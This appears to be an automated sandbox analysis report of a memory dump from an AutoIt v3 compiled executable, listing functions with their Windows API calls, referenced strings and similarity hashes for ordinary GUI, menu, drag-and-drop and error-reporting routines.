Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: a65988b61fb1ced0358fa9eb4025cbe1b9ec77fcf0a257a7ee669fcab01883b6
Instruction ID: 2680c5cb8e69463474aeacce461c7d25b1e5fd9f16fef23a59f5f5dba328ec77
Opcode Fuzzy Hash: a65988b61fb1ced0358fa9eb4025cbe1b9ec77fcf0a257a7ee669fcab01883b6
Instruction Fuzzy Hash: 88617171900218FFDF11DFA4DC48EAE7B79EB08320F10492AF911AB2A1D7B59D50DB94

Uniqueness

Uniqueness Score: -1.00%

Function 004027D9, Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 00420FF6: _malloc.LIBCMT ref: 0042100E

SystemParametersInfoW.USER32 ref: 004028BC
GetSystemMetrics.USER32 ref: 004028C4
SystemParametersInfoW.USER32 ref: 004028EF
GetSystemMetrics.USER32 ref: 004028F7
GetSystemMetrics.USER32 ref: 0040291C
SetRect.USER32 ref: 00402939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00402949
CreateWindowExW.USER32 ref: 0040297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00402990
GetClientRect.USER32(00000000,000000FF), ref: 004029AE
GetStockObject.GDI32(00000011), ref: 004029CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 004029D5

Part of subcall function 00402344: GetCursorPos.USER32(?), ref: 00402357
Part of subcall function 00402344: ScreenToClient.USER32(004C67B0,?), ref: 00402374
Part of subcall function 00402344: GetAsyncKeyState.USER32(00000001), ref: 00402399
Part of subcall function 00402344: GetAsyncKeyState.USER32(00000002), ref: 004023A7

SetTimer.USER32(00000000,00000000,00000028,00401256), ref: 004029FC

Strings

AutoIt v3 GUI, xrefs: 00402974

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer_malloc
String ID: AutoIt v3 GUI
API String ID: 1557154100-248962490
Opcode ID: e91bd24ba74080cd74cfc1830fb696eab295f4c42014310c8d637f17af1757b1
Instruction ID: 34a51bb5a318ae1a344add4034b802b2dd09297663e35ec0c622bb09f95dc302
Opcode Fuzzy Hash: e91bd24ba74080cd74cfc1830fb696eab295f4c42014310c8d637f17af1757b1
Instruction Fuzzy Hash: 21B18275600205AFDB14DF68DD89BAE7BB4FB08314F10863AFA15A72D0DB78A851CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0048C8EE, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

DragQueryPoint.SHELL32(?,?), ref: 0048C917

Part of subcall function 0048ADF1: ClientToScreen.USER32(?,?), ref: 0048AE1A
Part of subcall function 0048ADF1: GetWindowRect.USER32(?,?), ref: 0048AE90
Part of subcall function 0048ADF1: PtInRect.USER32(?,?,0048C304), ref: 0048AEA0

SendMessageW.USER32(?,000000B0,?,?), ref: 0048C980
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0048C98B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0048C9AE
_wcscat.LIBCMT ref: 0048C9DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0048C9F5
SendMessageW.USER32(?,000000B0,?,?), ref: 0048CA0E
SendMessageW.USER32(?,000000B1,?,?), ref: 0048CA25
SendMessageW.USER32(?,000000B1,?,?), ref: 0048CA47
DragFinish.SHELL32(?), ref: 0048CA4E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0048CB41

Strings

@GUI_DRAGFILE, xrefs: 0048CAF0
@GUI_DROPID, xrefs: 0048CA6E
@GUI_DRAGID, xrefs: 0048CAB9
prL, xrefs: 0048CA8B

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$prL
API String ID: 169749273-2894286323
Opcode ID: ec929c7eb308c956d4696457979e326e740a1c37d8f0c717ef0f9b2acb380181
Instruction ID: 9d54b60ae23129ec17e3264f3c4c669362dbaaf1ee08fbcc713ae4d442fb7e93
Opcode Fuzzy Hash: ec929c7eb308c956d4696457979e326e740a1c37d8f0c717ef0f9b2acb380181
Instruction Fuzzy Hash: B6617F71108301AFC701EF65DC85D9FBBF8EF88714F500A2EF591A21A1DB749A49CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0045B1E0, Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0045B23F

Strings

LAST, xrefs: 0045B204
HANDLE=, xrefs: 0045B238
[ACTIVE, xrefs: 0045B22C
REGEXP=, xrefs: 0045B254
[REGEXPTITLE:, xrefs: 0045B267
CLASSNAME=, xrefs: 0045B27C
[HANDLE:, xrefs: 0045B24B
ACTIVE, xrefs: 0045B21A
ALL, xrefs: 0045B2D3
[CLASS:, xrefs: 0045B28F
[ALL, xrefs: 0045B2E5
[LAST, xrefs: 0045B2EC

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 2213ed01e040fdc716a613116486208dbe276169ab052f6e2789e21990e1b36f
Instruction ID: 0a4734ff45ec4583e3e81acf795fc21f567cbd392f16838e952200b8ee8254f0
Opcode Fuzzy Hash: 2213ed01e040fdc716a613116486208dbe276169ab052f6e2789e21990e1b36f
Instruction Fuzzy Hash: B5318B30A04205A6DB14EA62CD43BEE77A4DF24756F60006FB941720D2EF6D6E09C9AE

Uniqueness

Uniqueness Score: -1.00%

Function 00467FA4, Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00467FE9
VariantCopy.OLEAUT32(00000000,?), ref: 00467FF2
VariantClear.OLEAUT32(00000000), ref: 00467FFE
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 004680EC
__swprintf.LIBCMT ref: 0046811C
VarR8FromDec.OLEAUT32(?,?), ref: 00468148
VariantInit.OLEAUT32(?), ref: 004681F9
SysFreeString.OLEAUT32(00000016), ref: 0046828D
VariantClear.OLEAUT32(?), ref: 004682E7
VariantClear.OLEAUT32(?), ref: 004682F6
VariantInit.OLEAUT32(00000000), ref: 00468334

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00468116
Default, xrefs: 004681A9

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: e67d1ae315f90c4ca836d1dca6ba80daee1d4c2f7f45fc434c07d11323f31a8c
Instruction ID: 2682ed8c0086b85f7f7a5589b892ebf4bccd9fa06ddd6521cb48c12ef20c28d5
Opcode Fuzzy Hash: e67d1ae315f90c4ca836d1dca6ba80daee1d4c2f7f45fc434c07d11323f31a8c
Instruction Fuzzy Hash: 30D1E330600515DBCB109F66C844B6AB7B4BF04704F158A6FE405AB2C1EF7DAC49EB6B

Uniqueness

Uniqueness Score: -1.00%

Function 0046A0B5, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,0048FB78), ref: 0046A0FC

Part of subcall function 00407F41: _memmove.LIBCMT ref: 00407F82

LoadStringW.USER32(?,?,00000FFF,?), ref: 0046A11E
__swprintf.LIBCMT ref: 0046A177
__swprintf.LIBCMT ref: 0046A190
_wprintf.LIBCMT ref: 0046A246
_wprintf.LIBCMT ref: 0046A264

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 0046A241
%I, xrefs: 0046A0C9
"%s" (%d) : ==> %s:, xrefs: 0046A25F
Line %d (File "%s"):, xrefs: 0046A171, 0046A18A
^ ERROR, xrefs: 0046A1E8
Error: , xrefs: 0046A20E

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%I
API String ID: 311963372-1791166345
Opcode ID: 8a11475fc0c8c91cbe9461f856699c7e652b3655790dabb8acb4e1853c200b4d
Instruction ID: 1303775e7231178a658396c91acb0fa552fc501cd72ad3af750fbe55f2e9d174
Opcode Fuzzy Hash: 8a11475fc0c8c91cbe9461f856699c7e652b3655790dabb8acb4e1853c200b4d
Instruction Fuzzy Hash: E9516171940509AACF15EBA1CD42EEEB779AF04304F1041BAF505721A1EB396F58CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 00469EA3, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00469EEA

Part of subcall function 00407F41: _memmove.LIBCMT ref: 00407F82

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00469F0B
__swprintf.LIBCMT ref: 00469F64
__swprintf.LIBCMT ref: 00469F7D
_wprintf.LIBCMT ref: 0046A024
_wprintf.LIBCMT ref: 0046A042

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 0046A01F
"%s" (%d) : ==> %s:, xrefs: 0046A03D
Incorrect parameters to object property !, xrefs: 00469FC6
^ ERROR , xrefs: 00469FB9
Line %d (File "%s"):, xrefs: 00469F5E, 00469F77
Error: , xrefs: 00469FEC

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: 0b787ccc529da43aacc92bb76e99e3aa105e54edbeb710d651dbabe912c46d1d
Instruction ID: 29e7590618fc63383b9363bf02462082d3fe4c4574b2377bec111ab1fce9246c
Opcode Fuzzy Hash: 0b787ccc529da43aacc92bb76e99e3aa105e54edbeb710d651dbabe912c46d1d
Instruction Fuzzy Hash: 34515271900609AADF15EBA1CD42EEEB779AF08304F10017BB50572191EB397F59CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 0045FDBA, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000002,?,0043E452,00000001,0000138C,00000001,00000002,00000001,?,00000000,00000002), ref: 0045FDEF
LoadStringW.USER32(00000000,?,0043E452,00000001), ref: 0045FDF8

Part of subcall function 00407F41: _memmove.LIBCMT ref: 00407F82

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0043E452,00000001,0000138C,00000001,00000002,00000001,?,00000000,00000002,00000001), ref: 0045FE1A
LoadStringW.USER32(00000000,?,0043E452,00000001), ref: 0045FE1D
__swprintf.LIBCMT ref: 0045FE6D
__swprintf.LIBCMT ref: 0045FE7E
_wprintf.LIBCMT ref: 0045FF27
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045FF3E

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0045FF22
Line %d:, xrefs: 0045FE78
Line %d (File "%s"):, xrefs: 0045FE67
^ ERROR, xrefs: 0045FED3
Error: , xrefs: 0045FEF5

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 6f62699721b6488f9b5e07915167fb972850f0d8873ef340990756ca801e51b6
Instruction ID: b72d063de52a6d97598c11586145e3d3ef420078c9f862c2cdf80dc6d20c8828
Opcode Fuzzy Hash: 6f62699721b6488f9b5e07915167fb972850f0d8873ef340990756ca801e51b6
Instruction Fuzzy Hash: 01414072904209A6CF14FBE1CD86DEE7778AF18705F50007AF501720D2DA386F49CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0048C49C, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0048C4EC
GetFocus.USER32 ref: 0048C4FC
GetDlgCtrlID.USER32(00000000), ref: 0048C507
_memset.LIBCMT ref: 0048C632
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0048C65D
GetMenuItemCount.USER32(?), ref: 0048C67D
GetMenuItemID.USER32(?,00000000), ref: 0048C690
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0048C6C4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0048C70C
CheckMenuRadioItem.USER32 ref: 0048C744
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0048C779

Strings

0, xrefs: 0048C62A

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: ccc037e6d443e53f3a62f25f2452dff04d6eeab222e7711bc9877893743ae70f
Instruction ID: 044de7e4dd35a86088de80346c1f5ac2e8e2e031d82544e17b68ab28cbecaa44
Opcode Fuzzy Hash: ccc037e6d443e53f3a62f25f2452dff04d6eeab222e7711bc9877893743ae70f
Instruction Fuzzy Hash: A1818E70608311AFDB10EF15C984A6FBBE8FB88314F104D2EF995A3291D774D905CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 004045DF, Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004045F9
GetMenuItemCount.USER32(004C6890), ref: 0043D7CD
GetMenuItemCount.USER32(004C6890), ref: 0043D87D
GetCursorPos.USER32(?), ref: 0043D8C1
SetForegroundWindow.USER32(00000000), ref: 0043D8CA
TrackPopupMenuEx.USER32(004C6890,00000000,?,00000000,00000000,00000000), ref: 0043D8DD
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0043D8E9

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: 9490ec5a4a562f1e19a84607bd5d48b970607660fc041d08b13ba27c1a5a2ef6
Instruction ID: 6ad6198a349bf1976c625735b1d5f841e5fdeefb3eec3c97a7380737a116b5bf
Opcode Fuzzy Hash: 9490ec5a4a562f1e19a84607bd5d48b970607660fc041d08b13ba27c1a5a2ef6
Instruction Fuzzy Hash: 6B713A70A00205BEEB209F15EC45FAABF64FF48358F200227F525662D1C7B96810DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040201B, Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004020D3
KillTimer.USER32(-00000001,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0040216E
DestroyAcceleratorTable.USER32 ref: 0043BEF6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BF27
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BF3E
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BF5A
DeleteObject.GDI32(00000000), ref: 0043BF6C

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 35d17ce7a2f1df5f60f967835c01b70b65e62aa590bc2f80f7e0e1f3cdd6ee0b
Instruction ID: 62d4407ef01395a22b5ebf1233624f5b0999fc02156c59d6ff76a6043205edb2
Opcode Fuzzy Hash: 35d17ce7a2f1df5f60f967835c01b70b65e62aa590bc2f80f7e0e1f3cdd6ee0b
Instruction Fuzzy Hash: 55616B34101610DFD725AF14CE48B2A77F1FF44315F11993EE642A6AE0C7B9A881DF99

Uniqueness

Uniqueness Score: -1.00%

Function 004021A5, Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC

GetSysColor.USER32(0000000F), ref: 004021D3

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: cdac9cb2508351c8145c21bbd88bb5245f40cba3cfb8a0d4cbe4db6e4b3f4d31
Instruction ID: 47503e6e8c25a14c6d04473920290e3c3a9e3a2f6008e0ea463bb1cae73e411f
Opcode Fuzzy Hash: cdac9cb2508351c8145c21bbd88bb5245f40cba3cfb8a0d4cbe4db6e4b3f4d31
Instruction Fuzzy Hash: FD41D731000140AFDF215FA8DC8CBBA3765EB46331F1446BAFD65AA2E2C7758C86DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0048C27C, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

Part of subcall function 00402344: GetCursorPos.USER32(?), ref: 00402357
Part of subcall function 00402344: ScreenToClient.USER32(004C67B0,?), ref: 00402374
Part of subcall function 00402344: GetAsyncKeyState.USER32(00000001), ref: 00402399
Part of subcall function 00402344: GetAsyncKeyState.USER32(00000002), ref: 004023A7

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0048C2E4
ImageList_EndDrag.COMCTL32 ref: 0048C2EA
ReleaseCapture.USER32 ref: 0048C2F0
SetWindowTextW.USER32(?,00000000), ref: 0048C39A
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0048C3AD
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0048C48F

Strings

@GUI_DRAGFILE, xrefs: 0048C424
@GUI_DROPID, xrefs: 0048C3E1
prL, xrefs: 0048C3FD
prL, xrefs: 0048C438

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$prL$prL
API String ID: 1924731296-740887564
Opcode ID: 525c38e43552ddcf993c14ab13cbc770c58205f2d392fd460294e5d9ddb4b1dc
Instruction ID: dc367e10a39d425f30cb391b84f58576d3d09b44280b1156dac04409bcc5156d
Opcode Fuzzy Hash: 525c38e43552ddcf993c14ab13cbc770c58205f2d392fd460294e5d9ddb4b1dc
Instruction Fuzzy Hash: 7451A170204304AFD700EF24C895F6E77E5FB88314F00892EF555972E1DB78A948DB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00462A16, Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00462A31
GetMenuItemInfoW.USER32(004C6890,000000FF,00000000,00000030), ref: 00462A92
SetMenuItemInfoW.USER32 ref: 00462AC8
Sleep.KERNEL32(000001F4), ref: 00462ADA
GetMenuItemCount.USER32(?), ref: 00462B1E
GetMenuItemID.USER32(?,00000000), ref: 00462B3A
GetMenuItemID.USER32(?,-00000001), ref: 00462B64
GetMenuItemID.USER32(?,?), ref: 00462BA9
CheckMenuRadioItem.USER32 ref: 00462BEF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462C03
SetMenuItemInfoW.USER32 ref: 00462C24

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 638b7d30cc1c27bdbe2d4b3278922b6b7190dbed23476bfa5db6d6130c3c592a
Instruction ID: 18a65889ef34665f5b2b5336e4e6eed4a99801a903535dc72d9624464193ca63
Opcode Fuzzy Hash: 638b7d30cc1c27bdbe2d4b3278922b6b7190dbed23476bfa5db6d6130c3c592a
Instruction Fuzzy Hash: 6461D4B0900649BFDB21CF54CE88DBF7BB8EB41704F14446EE841A7251E7B9AD05DB2A

Uniqueness

Uniqueness Score: -1.00%

Function 0045710E, Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00457135
SafeArrayAllocData.OLEAUT32(?), ref: 0045718E
VariantInit.OLEAUT32(?), ref: 004571A0
SafeArrayAccessData.OLEAUT32(?,?), ref: 004571C0
VariantCopy.OLEAUT32(?,?), ref: 00457213
SafeArrayUnaccessData.OLEAUT32(?), ref: 00457227
VariantClear.OLEAUT32(?), ref: 0045723C
SafeArrayDestroyData.OLEAUT32(?), ref: 00457249
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00457252
VariantClear.OLEAUT32(?), ref: 00457264
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0045726F

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 39c476187ccff697a273780f0898091cd701a43be4336868b05002cbdc86b2b4
Instruction ID: ee6ff97d49ab8f9c2dd167b55ca35aa0841007d9f21f2d6d7be11d351e1905ac
Opcode Fuzzy Hash: 39c476187ccff697a273780f0898091cd701a43be4336868b05002cbdc86b2b4
Instruction Fuzzy Hash: 61416031A00119AFCB00DFA9D8449AEBBB9FF18755F00847EF955E7362CB34A949CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00467C1A, Relevance: 15.3, APIs: 10, Instructions: 292COMMON

